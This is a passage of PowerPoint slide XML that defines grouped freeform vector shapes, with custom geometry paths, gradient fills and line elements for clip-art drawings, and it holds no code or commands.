              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="3651" y="2461"/>
                <a:ext cx="816" cy="561"/>
                <a:chOff x="3651" y="2461"/>
                <a:chExt cx="816" cy="561"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="90" name="Freeform 1078"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1">
                  <a:off x="3651" y="2642"/>
                  <a:ext cx="587" cy="380"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 3821"/>
                    <a:gd name="T1" fmla="*/ 2473 h 2473"/>
                    <a:gd name="T2" fmla="*/ 0 w 3821"/>
                    <a:gd name="T3" fmla="*/ 1025 h 2473"/>
                    <a:gd name="T4" fmla="*/ 3821 w 3821"/>
                    <a:gd name="T5" fmla="*/ 0 h 2473"/>
                    <a:gd name="T6" fmla="*/ 3821 w 3821"/>
                    <a:gd name="T7" fmla="*/ 1448 h 2473"/>
                    <a:gd name="T8" fmla="*/ 0 w 3821"/>
                    <a:gd name="T9" fmla="*/ 2473 h 247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821"/>
                    <a:gd name="T16" fmla="*/ 0 h 2473"/>
                    <a:gd name="T17" fmla="*/ 3821 w 3821"/>
                    <a:gd name="T18" fmla="*/ 2473 h 247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821" h="2473">
                      <a:moveTo>
                        <a:pt x="0" y="2473"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="1025"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3821" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3821" y="1448"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="2473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FFCC66"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="FFDD99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1079"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1">
                  <a:off x="3651" y="2461"/>
                  <a:ext cx="701" cy="339"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 4562 w 4562"/>
                    <a:gd name="T1" fmla="*/ 1180 h 2205"/>
                    <a:gd name="T2" fmla="*/ 3821 w 4562"/>
                    <a:gd name="T3" fmla="*/ 0 h 2205"/>
                    <a:gd name="T4" fmla="*/ 0 w 4562"/>
                    <a:gd name="T5" fmla="*/ 1024 h 2205"/>
                    <a:gd name="T6" fmla="*/ 741 w 4562"/>
                    <a:gd name="T7" fmla="*/ 2205 h 2205"/>
                    <a:gd name="T8" fmla="*/ 4562 w 4562"/>
                    <a:gd name="T9" fmla="*/ 1180 h 220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62"/>
                    <a:gd name="T16" fmla="*/ 0 h 2205"/>
                    <a:gd name="T17" fmla="*/ 4562 w 4562"/>
                    <a:gd name="T18" fmla="*/ 2205 h 220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62" h="2205">
                      <a:moveTo>
                        <a:pt x="4562" y="1180"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="3821" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1024"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="741" y="2205"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4562" y="118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B3B3B"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="808080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1080"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1">
                  <a:off x="4238" y="2618"/>
                  <a:ext cx="229" cy="182"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 746 w 1487"/>
                    <a:gd name="T1" fmla="*/ 0 h 1181"/>
                    <a:gd name="T2" fmla="*/ 1487 w 1487"/>
                    <a:gd name="T3" fmla="*/ 1181 h 1181"/>
                    <a:gd name="T4" fmla="*/ 1487 w 1487"/>
                    <a:gd name="T5" fmla="*/ 1181 h 1181"/>
                    <a:gd name="T6" fmla="*/ 0 w 1487"/>
                    <a:gd name="T7" fmla="*/ 783 h 1181"/>
                    <a:gd name="T8" fmla="*/ 746 w 1487"/>
                    <a:gd name="T9" fmla="*/ 0 h 118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87"/>
                    <a:gd name="T16" fmla="*/ 0 h 1181"/>
                    <a:gd name="T17" fmla="*/ 1487 w 1487"/>
                    <a:gd name="T18" fmla="*/ 1181 h 118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87" h="1181">
                      <a:moveTo>
                        <a:pt x="746" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="1487" y="1181"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="783"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="74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B3B3B"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="808080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1081"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1">
                  <a:off x="4238" y="2739"/>
                  <a:ext cx="229" cy="283"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1487 w 1487"/>
                    <a:gd name="T1" fmla="*/ 398 h 1841"/>
                    <a:gd name="T2" fmla="*/ 1487 w 1487"/>
                    <a:gd name="T3" fmla="*/ 1841 h 1841"/>
                    <a:gd name="T4" fmla="*/ 0 w 1487"/>
                    <a:gd name="T5" fmla="*/ 1443 h 1841"/>
                    <a:gd name="T6" fmla="*/ 0 w 1487"/>
                    <a:gd name="T7" fmla="*/ 0 h 1841"/>
                    <a:gd name="T8" fmla="*/ 0 w 1487"/>
                    <a:gd name="T9" fmla="*/ 0 h 1841"/>
                    <a:gd name="T10" fmla="*/ 1487 w 1487"/>
                    <a:gd name="T11" fmla="*/ 398 h 184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487"/>
                    <a:gd name="T19" fmla="*/ 0 h 1841"/>
                    <a:gd name="T20" fmla="*/ 1487 w 1487"/>
                    <a:gd name="T21" fmla="*/ 1841 h 184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487" h="1841">
                      <a:moveTo>
                        <a:pt x="1487" y="398"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="1487" y="1841"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1443"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1487" y="39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FFCC66"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="FFDD99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94" name="Group 1141"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4048" y="2831"/>
                  <a:ext cx="157" cy="185"/>
                  <a:chOff x="4048" y="2831"/>
                  <a:chExt cx="157" cy="185"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="101" name="Freeform 1089"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="4126" y="2852"/>
                    <a:ext cx="79" cy="164"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 512"/>
                      <a:gd name="T1" fmla="*/ 1067 h 1067"/>
                      <a:gd name="T2" fmla="*/ 0 w 512"/>
                      <a:gd name="T3" fmla="*/ 137 h 1067"/>
                      <a:gd name="T4" fmla="*/ 512 w 512"/>
                      <a:gd name="T5" fmla="*/ 0 h 1067"/>
                      <a:gd name="T6" fmla="*/ 512 w 512"/>
                      <a:gd name="T7" fmla="*/ 930 h 1067"/>
                      <a:gd name="T8" fmla="*/ 0 w 512"/>
                      <a:gd name="T9" fmla="*/ 1067 h 106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12"/>
                      <a:gd name="T16" fmla="*/ 0 h 1067"/>
                      <a:gd name="T17" fmla="*/ 512 w 512"/>
                      <a:gd name="T18" fmla="*/ 1067 h 106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12" h="1067">
                        <a:moveTo>
                          <a:pt x="0" y="1067"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="137"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="512" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="512" y="930"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="1067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6C2400"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="993300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2" name="Freeform 1090"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="4048" y="2831"/>
                    <a:ext cx="78" cy="164"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 511"/>
                      <a:gd name="T1" fmla="*/ 1068 h 1068"/>
                      <a:gd name="T2" fmla="*/ 0 w 511"/>
                      <a:gd name="T3" fmla="*/ 138 h 1068"/>
                      <a:gd name="T4" fmla="*/ 511 w 511"/>
                      <a:gd name="T5" fmla="*/ 0 h 1068"/>
                      <a:gd name="T6" fmla="*/ 511 w 511"/>
                      <a:gd name="T7" fmla="*/ 931 h 1068"/>
                      <a:gd name="T8" fmla="*/ 0 w 511"/>
                      <a:gd name="T9" fmla="*/ 1068 h 10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11"/>
                      <a:gd name="T16" fmla="*/ 0 h 1068"/>
                      <a:gd name="T17" fmla="*/ 511 w 511"/>
                      <a:gd name="T18" fmla="*/ 1068 h 10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11" h="1068">
                        <a:moveTo>
                          <a:pt x="0" y="1068"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="138"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="511" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="511" y="931"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="106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6C2400"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="993300"/>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="2700000" scaled="1"/>
                  </a:gra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95" name="Freeform 1091"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1">
                  <a:off x="3879" y="2751"/>
                  <a:ext cx="66" cy="75"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 432"/>
                    <a:gd name="T1" fmla="*/ 489 h 489"/>
                    <a:gd name="T2" fmla="*/ 0 w 432"/>
                    <a:gd name="T3" fmla="*/ 115 h 489"/>
                    <a:gd name="T4" fmla="*/ 432 w 432"/>
                    <a:gd name="T5" fmla="*/ 0 h 489"/>
                    <a:gd name="T6" fmla="*/ 432 w 432"/>
                    <a:gd name="T7" fmla="*/ 374 h 489"/>
                    <a:gd name="T8" fmla="*/ 0 w 432"/>
                    <a:gd name="T9" fmla="*/ 489 h 4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32"/>
                    <a:gd name="T16" fmla="*/ 0 h 489"/>
                    <a:gd name="T17" fmla="*/ 432 w 432"/>
                    <a:gd name="T18" fmla="*/ 489 h 4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32" h="489">
                      <a:moveTo>
                        <a:pt x="0" y="489"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="115"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="432" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="432" y="374"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="48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6C2400"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="993300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1092"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1">
                  <a:off x="3729" y="2710"/>
                  <a:ext cx="66" cy="75"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 432"/>
                    <a:gd name="T1" fmla="*/ 489 h 489"/>
                    <a:gd name="T2" fmla="*/ 0 w 432"/>
                    <a:gd name="T3" fmla="*/ 115 h 489"/>
                    <a:gd name="T4" fmla="*/ 432 w 432"/>
                    <a:gd name="T5" fmla="*/ 0 h 489"/>
                    <a:gd name="T6" fmla="*/ 432 w 432"/>
                    <a:gd name="T7" fmla="*/ 374 h 489"/>
                    <a:gd name="T8" fmla="*/ 0 w 432"/>
                    <a:gd name="T9" fmla="*/ 489 h 4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32"/>
                    <a:gd name="T16" fmla="*/ 0 h 489"/>
                    <a:gd name="T17" fmla="*/ 432 w 432"/>
                    <a:gd name="T18" fmla="*/ 489 h 4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32" h="489">
                      <a:moveTo>
                        <a:pt x="0" y="489"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="115"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="432" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="432" y="374"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="48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6C2400"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="993300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Line 1093"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipV="1">
                  <a:off x="4121" y="2587"/>
                  <a:ext cx="114" cy="181"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/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Line 1094"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipV="1">
                  <a:off x="4004" y="2556"/>
                  <a:ext cx="113" cy="181"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/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Line 1095"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipV="1">
                  <a:off x="3889" y="2525"/>
                  <a:ext cx="114" cy="181"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/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Line 1096"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipV="1">
                  <a:off x="3773" y="2494"/>
                  <a:ext cx="114" cy="181"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="6350">
                  <a:solidFill>
                    <a:srgbClr val="130D1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" name="Group 1098"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="3867" y="2880"/>
                <a:ext cx="289" cy="202"/>
                <a:chOff x="-1496" y="3101"/>
                <a:chExt cx="4084" cy="2842"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="49" name="Freeform 1099"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2087" y="4070"/>
                  <a:ext cx="168" cy="484"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 168"/>
                    <a:gd name="T1" fmla="*/ 484 h 484"/>
                    <a:gd name="T2" fmla="*/ 0 w 168"/>
                    <a:gd name="T3" fmla="*/ 45 h 484"/>
                    <a:gd name="T4" fmla="*/ 168 w 168"/>
                    <a:gd name="T5" fmla="*/ 0 h 484"/>
                    <a:gd name="T6" fmla="*/ 168 w 168"/>
                    <a:gd name="T7" fmla="*/ 442 h 484"/>
                    <a:gd name="T8" fmla="*/ 0 w 168"/>
                    <a:gd name="T9" fmla="*/ 484 h 4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8"/>
                    <a:gd name="T16" fmla="*/ 0 h 484"/>
                    <a:gd name="T17" fmla="*/ 168 w 168"/>
                    <a:gd name="T18" fmla="*/ 484 h 4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8" h="484">
                      <a:moveTo>
                        <a:pt x="0" y="484"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="45"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="168" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="168" y="442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0" name="Freeform 1100"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2057" y="4108"/>
                  <a:ext cx="30" cy="446"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 30 w 30"/>
                    <a:gd name="T1" fmla="*/ 7 h 446"/>
                    <a:gd name="T2" fmla="*/ 0 w 30"/>
                    <a:gd name="T3" fmla="*/ 0 h 446"/>
                    <a:gd name="T4" fmla="*/ 0 w 30"/>
                    <a:gd name="T5" fmla="*/ 439 h 446"/>
                    <a:gd name="T6" fmla="*/ 30 w 30"/>
                    <a:gd name="T7" fmla="*/ 446 h 446"/>
                    <a:gd name="T8" fmla="*/ 30 w 30"/>
                    <a:gd name="T9" fmla="*/ 7 h 44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446"/>
                    <a:gd name="T17" fmla="*/ 30 w 30"/>
                    <a:gd name="T18" fmla="*/ 446 h 44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446">
                      <a:moveTo>
                        <a:pt x="30" y="7"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="439"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="30" y="446"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="30" y="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Freeform 1101"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2057" y="4063"/>
                  <a:ext cx="198" cy="52"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 198 w 198"/>
                    <a:gd name="T1" fmla="*/ 7 h 52"/>
                    <a:gd name="T2" fmla="*/ 165 w 198"/>
                    <a:gd name="T3" fmla="*/ 0 h 52"/>
                    <a:gd name="T4" fmla="*/ 0 w 198"/>
                    <a:gd name="T5" fmla="*/ 45 h 52"/>
                    <a:gd name="T6" fmla="*/ 30 w 198"/>
                    <a:gd name="T7" fmla="*/ 52 h 52"/>
                    <a:gd name="T8" fmla="*/ 198 w 198"/>
                    <a:gd name="T9" fmla="*/ 7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8"/>
                    <a:gd name="T16" fmla="*/ 0 h 52"/>
                    <a:gd name="T17" fmla="*/ 198 w 198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8" h="52">
                      <a:moveTo>
                        <a:pt x="198" y="7"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="165" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="45"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="30" y="52"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="198" y="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2" name="Freeform 1102"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2033" y="3992"/>
                  <a:ext cx="26" cy="31"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 2 w 11"/>
                    <a:gd name="T1" fmla="*/ 2 h 13"/>
                    <a:gd name="T2" fmla="*/ 9 w 11"/>
                    <a:gd name="T3" fmla="*/ 4 h 13"/>
                    <a:gd name="T4" fmla="*/ 10 w 11"/>
                    <a:gd name="T5" fmla="*/ 12 h 13"/>
                    <a:gd name="T6" fmla="*/ 2 w 11"/>
                    <a:gd name="T7" fmla="*/ 9 h 13"/>
                    <a:gd name="T8" fmla="*/ 2 w 11"/>
                    <a:gd name="T9" fmla="*/ 2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"/>
                    <a:gd name="T16" fmla="*/ 0 h 13"/>
                    <a:gd name="T17" fmla="*/ 11 w 11"/>
                    <a:gd name="T18" fmla="*/ 13 h 1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" h="13">
                      <a:moveTo>
                        <a:pt x="2" y="2"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="0"/>
                        <a:pt x="7" y="1"/>
                        <a:pt x="9" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="7"/>
                        <a:pt x="11" y="10"/>
                        <a:pt x="10" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="13"/>
                        <a:pt x="5" y="12"/>
                        <a:pt x="2" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="6"/>
                        <a:pt x="0" y="3"/>
                        <a:pt x="2" y="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Freeform 1103"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2033" y="4672"/>
                  <a:ext cx="26" cy="29"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 2 w 11"/>
                    <a:gd name="T1" fmla="*/ 1 h 12"/>
                    <a:gd name="T2" fmla="*/ 9 w 11"/>
                    <a:gd name="T3" fmla="*/ 4 h 12"/>
                    <a:gd name="T4" fmla="*/ 10 w 11"/>
                    <a:gd name="T5" fmla="*/ 11 h 12"/>
                    <a:gd name="T6" fmla="*/ 2 w 11"/>
                    <a:gd name="T7" fmla="*/ 9 h 12"/>
                    <a:gd name="T8" fmla="*/ 2 w 11"/>
                    <a:gd name="T9" fmla="*/ 1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"/>
                    <a:gd name="T16" fmla="*/ 0 h 12"/>
                    <a:gd name="T17" fmla="*/ 11 w 11"/>
                    <a:gd name="T18" fmla="*/ 12 h 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" h="12">
                      <a:moveTo>
                        <a:pt x="2" y="1"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="0"/>
                        <a:pt x="7" y="1"/>
                        <a:pt x="9" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="6"/>
                        <a:pt x="11" y="10"/>
                        <a:pt x="10" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="12"/>
                        <a:pt x="5" y="11"/>
                        <a:pt x="2" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="6"/>
                        <a:pt x="0" y="3"/>
                        <a:pt x="2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4" name="Freeform 1104"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2045" y="3940"/>
                  <a:ext cx="220" cy="756"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 93"/>
                    <a:gd name="T1" fmla="*/ 25 h 320"/>
                    <a:gd name="T2" fmla="*/ 2 w 93"/>
                    <a:gd name="T3" fmla="*/ 33 h 320"/>
                    <a:gd name="T4" fmla="*/ 85 w 93"/>
                    <a:gd name="T5" fmla="*/ 10 h 320"/>
                    <a:gd name="T6" fmla="*/ 85 w 93"/>
                    <a:gd name="T7" fmla="*/ 290 h 320"/>
                    <a:gd name="T8" fmla="*/ 0 w 93"/>
                    <a:gd name="T9" fmla="*/ 312 h 320"/>
                    <a:gd name="T10" fmla="*/ 2 w 93"/>
                    <a:gd name="T11" fmla="*/ 320 h 320"/>
                    <a:gd name="T12" fmla="*/ 93 w 93"/>
                    <a:gd name="T13" fmla="*/ 296 h 320"/>
                    <a:gd name="T14" fmla="*/ 93 w 93"/>
                    <a:gd name="T15" fmla="*/ 0 h 320"/>
                    <a:gd name="T16" fmla="*/ 0 w 93"/>
                    <a:gd name="T17" fmla="*/ 25 h 32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93"/>
                    <a:gd name="T28" fmla="*/ 0 h 320"/>
                    <a:gd name="T29" fmla="*/ 93 w 93"/>
                    <a:gd name="T30" fmla="*/ 320 h 32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93" h="320">
                      <a:moveTo>
                        <a:pt x="0" y="25"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="33"/>
                        <a:pt x="2" y="33"/>
                        <a:pt x="2" y="33"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="33"/>
                        <a:pt x="76" y="13"/>
                        <a:pt x="85" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="85" y="20"/>
                        <a:pt x="85" y="284"/>
                        <a:pt x="85" y="290"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="79" y="291"/>
                        <a:pt x="0" y="312"/>
                        <a:pt x="0" y="312"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="320"/>
                        <a:pt x="2" y="320"/>
                        <a:pt x="2" y="320"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="93" y="296"/>
                        <a:pt x="93" y="296"/>
                        <a:pt x="93" y="296"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="93" y="0"/>
                        <a:pt x="93" y="0"/>
                        <a:pt x="93" y="0"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="0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Freeform 1105"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="344" y="5258"/>
                  <a:ext cx="435" cy="435"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 187 w 435"/>
                    <a:gd name="T1" fmla="*/ 435 h 435"/>
                    <a:gd name="T2" fmla="*/ 0 w 435"/>
                    <a:gd name="T3" fmla="*/ 241 h 435"/>
                    <a:gd name="T4" fmla="*/ 435 w 435"/>
                    <a:gd name="T5" fmla="*/ 0 h 435"/>
                    <a:gd name="T6" fmla="*/ 380 w 435"/>
                    <a:gd name="T7" fmla="*/ 383 h 435"/>
                    <a:gd name="T8" fmla="*/ 187 w 435"/>
                    <a:gd name="T9" fmla="*/ 435 h 4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35"/>
                    <a:gd name="T16" fmla="*/ 0 h 435"/>
                    <a:gd name="T17" fmla="*/ 435 w 435"/>
                    <a:gd name="T18" fmla="*/ 435 h 4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35" h="435">
                      <a:moveTo>
                        <a:pt x="187" y="435"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="241"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="435" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="380" y="383"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="187" y="43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6" name="Freeform 1106"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="-1449" y="4762"/>
                  <a:ext cx="458" cy="449"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 187 w 458"/>
                    <a:gd name="T1" fmla="*/ 449 h 449"/>
                    <a:gd name="T2" fmla="*/ 0 w 458"/>
                    <a:gd name="T3" fmla="*/ 255 h 449"/>
                    <a:gd name="T4" fmla="*/ 458 w 458"/>
                    <a:gd name="T5" fmla="*/ 0 h 449"/>
                    <a:gd name="T6" fmla="*/ 380 w 458"/>
                    <a:gd name="T7" fmla="*/ 397 h 449"/>
                    <a:gd name="T8" fmla="*/ 187 w 458"/>
                    <a:gd name="T9" fmla="*/ 449 h 4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8"/>
                    <a:gd name="T16" fmla="*/ 0 h 449"/>
                    <a:gd name="T17" fmla="*/ 458 w 458"/>
                    <a:gd name="T18" fmla="*/ 449 h 4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8" h="449">
                      <a:moveTo>
                        <a:pt x="187" y="449"/>
